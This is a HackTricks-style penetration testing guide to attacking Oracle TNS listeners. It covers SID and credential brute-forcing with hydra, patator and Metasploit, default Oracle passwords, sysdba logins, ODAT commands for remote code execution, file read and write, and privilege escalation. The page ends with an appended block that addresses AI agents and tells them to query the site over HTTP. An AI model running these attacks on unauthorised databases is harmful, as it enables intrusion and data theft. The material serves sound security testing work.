# 1521,1522-1529 - Pentesting Oracle TNS Listener
🎙️ HackTricks LIVE Twitch Wednesdays 5.30pm (UTC) 🎙️ - 🎥 Youtube 🎥
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
## Basic Information
Oracle database (Oracle DB) is a relational database management system (RDBMS) from the Oracle Corporation (from [here](https://www.techopedia.com/definition/8711/oracle-database)).
When enumerating Oracle the first step is to talk to the TNS-Listener that usually resides on the default port (1521/TCP, -you may also get secondary listeners on 1522–1529-).
```
1521/tcp open oracle-tns Oracle TNS Listener 9.2.0.1.0 (for 32-bit Windows)
1748/tcp open oracle-tns Oracle TNS Listener
```
## Summary
1. **Enumerate version** info (search for **known vulns**)
2. **Bruteforce TNS listener** communication (not always needed)
3. **Enumerate**/Bruteforce **SID names** (like database names)
4. **Bruteforce credentials** for valid SID name discovered
5. Try to **execute code**
In order to user MSF oracle modules you need to install some dependencies: [**Installation**](/dashboard/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener/oracle-pentesting-requirements-installation.md)
## Enumeration
Tools that can be used for this are: nmap, MSF and [tnscmd10g](http://dokfleed.net/files/audit/tnscmd10g.zip).
### TNS listener version
```bash
nmap --script "oracle-tns-version" -p 1521 -T4 -sV
msf> use auxiliary/scanner/oracle/tnslsnr_version
#apt install tnscmd10g
tnscmd10g version -p 1521 -h
```
Other useful TNS listener commands:
| **Command** | **Purpose** |
| ------------ | --------------------------------------------------------------- |
| ping | Ping the listener |
| version | Provide output of the listener version and platform information |
| status | Return the current status and variables used by the listener |
| services | Dump service data |
| debug | Dump debugging information to the listener log |
| reload | Reload the listener configuration file |
| save\_config | Write the listener configuration file to a backup location |
| stop | Invoke listener shutdown |
If you **receive an error**, could be because **TNS versions are incompatible** (Use the `--10G` parameter with `tnscmd10`) and if the **error persist,** the listener may be **password protected** (you can see a list were all the [**errors are detailed here**](https://docs.oracle.com/database/121/ERRMG/TNS-00000.htm#ERRMG-GUID-D723D931-ECBA-4FA4-BF1B-1F4FE2EEBAD7)) — don't worry… hydra to the rescue\*\*:\*\*
```
hydra -P rockyou.txt -t 32 -s 1521 host.victim oracle-listener
```
The TNS listener could be vulnerable to **MitM** attacks. [Check here how to check if the server is vulnerable and how to perform the attack (all versions up to version 12c are)](/dashboard/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener/tns-poison.md).
### SID enumeration
#### **What is a SID**
The SID (Service Identifier) is essentially the database name, depending on the install you may have one or more default SIDs, or even a totally custom dba defined SID.
**In some old versions (in 9 it works)** you could ask for the SID and the database send it to you:
```bash
tnscmd10g status-p 1521 -h #The SID are inside: SERVICE=(SERVICE_NAME=)
#msf1
msf> use auxiliary/scanner/oracle/sid_enum
msf> set rhost
msf> run
#msf2
msf> use auxiliary/admin/oracle/tnscmd
msf> set CMD (CONNECT_DATA=(COMMAND=STATUS))
msf> set rhost
msf> run #The SID are inside: SERVICE=(SERVICE_NAME=)
```
If you cant access this way to the SIDs you will need to bruteforce them:
**SID Bruteforce**
I have merged the nmap and MSF sid lists into this one (without duplicates):
```bash
hydra -L /usr/share/metasploit-framework/data/wordlists/sid.txt -s 1521 oracle-sid
patator oracle_login host= sid=FILE0 0=sids-oracle.txt -x ignore:code=ORA-12505
./odat.py sidguesser -s $SERVER -d $SID --sids-file=./sids.txt
msf> use auxiliary/admin/oracle/sid_brute #This will use the list located at /usr/share/metasploit-framework/data/wordlists/sid.txt
nmap --script +oracle-sid-brute -p 1521 10.11.1.202 #This will use the list lcated at /usr/share/nmap/nselib/data/oracle-sids
```
In order to use **oracle\_login** with **patator** you need to **install**:
```
pip3 install cx_Oracle --upgrade
```
## **Targeting Accounts**
**Got SID?** Excellent, now let’s move to the next task and extract the user account information. From this point, you can connect to the listener and brute-force credentials.
**Metasploit** *\*\*scanner/oracle/oracle\_login* It has a built-in dictionary for the **most popular default values of user account** information presented as login:password. By the way, such default entries represent one of the most popular and serious security problems in Oracle.
**Nmap** can also help here with the script *oracle-brute*. Note that this script **mixes the logins and passwords**, that is, it tries each login against every password, and it takes quite a while!
### **Default Passwords**
Below are some of the default passwords associated with Oracle:
* **DBSNMP/DBSNMP** — Intelligent Agent uses this to talk to the db server (its some work to change it)
* **SYS/CHANGE\_ON\_INSTALL** — Default sysdba account before and including Oracle v9, as of version 10g this has to be different!
* **PCMS\_SYS/PCMS\_SYS** — Default x account
* **WMSYS/WMSYS** — Default x account
* **OUTLN/OUTLN** — Default x account
* **SCOTT/TIGER** — Default x account
Other **default passwords** can be found [here ](http://www.petefinnigan.com/default/oracle_default_passwords.htm)and [here](https://cirt.net/passwords?vendor=Oracle).
The versions 11.1.0.6, 11.1.0.7, 11.2.0.1, 11.2.0.2, and 11.2.0.3 are vulnerable to **offline brute force**. [**Read more about this technique here.**](/dashboard/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener/remote-stealth-pass-brute-force.md)
### User/Pass bruteforce
Different tools offered **different user/pass lists** for oracle:
* **oscan:** */usr/share/oscanner/accounts.default* (169 lines)
* **MSF-1:** *from* admin/oracle/oracle\_login \_\_/usr/share/metasploit-framework/data/wordlists/oracle\_default\_passwords.csv (598 lines)
* **MSF-2:** *from scanner/oracle/oracle\_login* */usr/share/metasploit-framework/data/wordlists/oracle\_default\_userpass.txt* (568 lines)
* **Nmap:** */usr/share/nmap/nselib/data/oracle-default-accounts.lst* (687 lines)
I have **mixed** all of them and **removed duplicates:**
### [Brute Force](/dashboard/generic-methodologies-and-resources/brute-force.md#oraclesql)
Now, that you **know a valid SID and valid credentials**. To connect to the database you need the tool: ***sqlplus*** and to install it you need to follow some steps:
[Installation](/dashboard/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener/oracle-pentesting-requirements-installation.md)
To login using known credentials:
```
sqlplus /@/;
```
If the TNS Listener is on a non-default port (e.g. TCP/1522) :
```
sqlplus /@:/;
```
If an **account has system database priviledges (sysdba) or system operator (sysop)** you may wish to try the following:
```bash
sqlplus /@/ 'as sysdba';
#Example:
sqlplus SYSTEM/MANAGER@192.168.0.2/ORCL 'as sysdba'
```
## **All in One**
**An interesting tool is oscanner**, which will try to get some valid SID and then it will brute-force for valid credentials and try to extract some information:
```bash
#apt install oscanner
oscanner -s -P
```
Another tool that will do all of this it [**odat**](https://github.com/quentinhardy/odat):
```bash
git clone https://github.com/quentinhardy/odat.git
cd odat
./odat.py --help #It shouldn't be problems in Kali
./odat.py all -s -p
./odat.py all -s -p -d #To bruteforce accounts for that SID
```
With these options (*-s* and *-p*), ODAT will **search valid SID** (System ID) in a first step. You can configure some options for configuring methods (i.e. word-list or brute-force attack). By default, ODAT will use a big word list and it will do a small brute-force attack.
If ODAT **founds at least one SID** (e.g. *ORCL*), it will **search valid Oracle accounts**. It will do that on **each SID found**. You can specify some options for credentials (e.g. *--accounts-file*, *--accounts-files*, *--login-as-pwd*).
For **each valid account** (e.g. *SYS*) **on each valid instance** (SID), ODAT will return **what each Oracle user can do** (e.g. reverse shell, read files, become DBA).
[**Wiki odat**](https://github.com/quentinhardy/odat/wiki)
## Remote Code Execution
There are at least two different ways to execute commands, such as by using Java procedures and DBMS\_SCHEDULER package. By the way, you can also achieve RCE in case of SQL injection in a web application provided, of course, that the user running it has sufficient rights. At this stage, I highly recommend preparing the Oracle Database Attacking Tool: [ODAT](https://github.com/quentinhardy/odat).
### Install ODAT
```bash
git clone https://github.com/quentinhardy/odat.git
cd odat
./odat.py #It shouldn't be problems in Kali
```
### Execute Code via Java Stored Procedure
```bash
./odat.py java -s -U -P -d --exec COMMAND
```
[More details here](/dashboard/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener/oracle-rce-and-more.md#rce-java-store-procedure)
### Execute code via Scheduler
```bash
./odat.py dbmsscheduler -s -d -U -P --exec "C:\windows\system32\cmd.exe /c echo 123>>C:\hacK"
```
[More details here](/dashboard/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener/oracle-rce-and-more.md#rce-scheduler)
### Execute code via External Tables
```bash
./odat.py externaltable -s -U -P -d --exec "C:/windows/system32" "calc.exe"
```
‘ODAT.py’ requires the privilege ‘CREATE ANY DIRECTORY’, which, by default, is granted only to DBA role, since it attempts to execute the file from any and not only “your” directory (the manual version of this attack requires less privileges).
[More details here.](/dashboard/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener/oracle-rce-and-more.md#rce-external-tables)
## Read/Write files
```bash
./odat.py utlfile -s -d -U -P --getFile "C:/test" token.txt token.txt
./odat.py externaltable -s -U -P -d --getFile "C:/test" "my4.txt" "my"
```
[More details here](/dashboard/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener/oracle-rce-and-more.md#read-write-files)
## Elevating Privileges
[More details here](/dashboard/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener/oracle-rce-and-more.md#elevating-privileges)
You can use the [privesc ](https://github.com/quentinhardy/odat/wiki/privesc)module from odat to escalate privileges. In that link you can find **several ways to escalate privileges using odat.**
```bash
./odat.py privesc -s $SERVER -d $ID -U $USER -P $PASSWORD -h #Get module Help
```
Vulnerability tested on oracle 10.1.0.3.0 – should work on thru 10.1.0.5.0 and supposedly on 11g. Fixed with Oracle Critical Patch update October 2007.
```bash
msf> use auxiliary/sqli/oracle/lt_findricset_cursor
```
## Free Virtual Environment for testing
If you want to practice attacking Oracle databases, the safest way is to register for the Oracle Developer Days Virtualbox VM:
{% embed url="" %}
Most part of the information in this post was extracted from: and from
Other interesting **references**:
## HackTricks Automatic Commands
```
Protocol_Name: Oracle #Protocol Abbreviation if there is one.
Port_Number: 1521 #Comma separated if there is more than one.
Protocol_Description: Oracle TNS Listener #Protocol Abbreviation Spelled out
Entry_1:
Name: Notes
Description: Notes for Oracle
Note: |
Oracle database (Oracle DB) is a relational database management system (RDBMS) from the Oracle Corporation
#great oracle enumeration tool
navigate to https://github.com/quentinhardy/odat/releases/
download the latest
tar -xvf odat-linux-libc2.12-x86_64.tar.gz
cd odat-libc2.12-x86_64/
./odat-libc2.12-x86_64 all -s 10.10.10.82
for more details check https://github.com/quentinhardy/odat/wiki
https://book.hacktricks.xyz/pentesting/1521-1522-1529-pentesting-oracle-listener
Entry_2:
Name: Nmap
Description: Nmap with Oracle Scripts
Command: nmap --script "oracle-tns-version" -p 1521 -T4 -sV {IP}
```
🎙️ HackTricks LIVE Twitch Wednesdays 5.30pm (UTC) 🎙️ - 🎥 Youtube 🎥
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://breached.gitbook.io/dashboard/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.